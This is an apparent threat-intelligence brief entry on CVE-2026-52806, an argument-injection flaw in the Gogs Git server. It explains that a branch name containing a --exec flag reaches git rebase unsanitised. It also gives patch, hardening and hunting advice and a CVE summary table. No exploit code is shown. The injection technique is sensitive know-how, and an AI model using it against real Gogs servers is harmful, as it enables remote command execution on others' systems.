Home · Briefs · CTI Daily Brief — 2026-06-20
CVE-2026-52806 — Gogs self-hosted Git server: argument injection to OS command execution (BSI critical batch)
From CTI Daily Brief — 2026-06-20 · published 2026-06-20
BSI advisory WID-SEC-2026-2013 (rated kritisch, 2026-06-19) consolidates a batch of more than 20 CVEs in the Gogs self-hosted Git server (BSI CERT-Bund, 2026-06-19). The most severe, CVE-2026-52806 (CWE-77 command injection; CVSS 4.0 9.4 per BSI, CVSS 3.1 9.9 per the GitHub advisory), lets a user craft a branch name containing a --exec Git flag that Gogs passes unsanitised to git rebase, yielding arbitrary OS command execution as the Gogs process owner when a rebase is triggered. Because Gogs ships with open self-registration enabled and no repository-count limit by default, the "authenticated" prerequisite is effectively eliminated on default-configured internet-exposed instances (GitHub Security Advisory GHSA-qf6p-p7ww-cwr9). All issues are fixed in Gogs 0.14.3 (released 2026-06-07; the BSI consolidation followed a May 2026 disclosure that the bugs were then unpatched). Gogs is common in EU research institutions, universities and smaller public-sector IT teams as a lightweight Git host. Upgrade to 0.14.3, set [service] DISABLE_REGISTRATION = true if registration is not required, run the Gogs process under a minimal-privilege shell-less user, and hunt for git child processes carrying --exec arguments.
CVE Summary Table
| CVE | Product | CVSS | EPSS | KEV | Exploited | Patch | Source |
|---|---|---|---|---|---|---|---|
| CVE-2026-12569 | PTC Windchill / FlexPLM | 10.0 (v3.1) / 9.3 (v4.0) | n/a | No | Yes (BSI/NCSC-CH confirmed) | 12.1.2.27 / 13.0.2.12 / 13.1.2.8 / 13.1.3.4 (2026-06-15) | Heise |
| CVE-2026-40624 | AVer PTC500S/PTC115/PTC500+/PTC115+ cameras | 9.8 (v3.1) | n/a | No | Unknown | Firmware update (all models) | CISA |
| CVE-2026-52806 | Gogs self-hosted Git server | 9.4 (v4.0) | n/a | No | Not observed | 0.14.3 (2026-06-07) | BSI |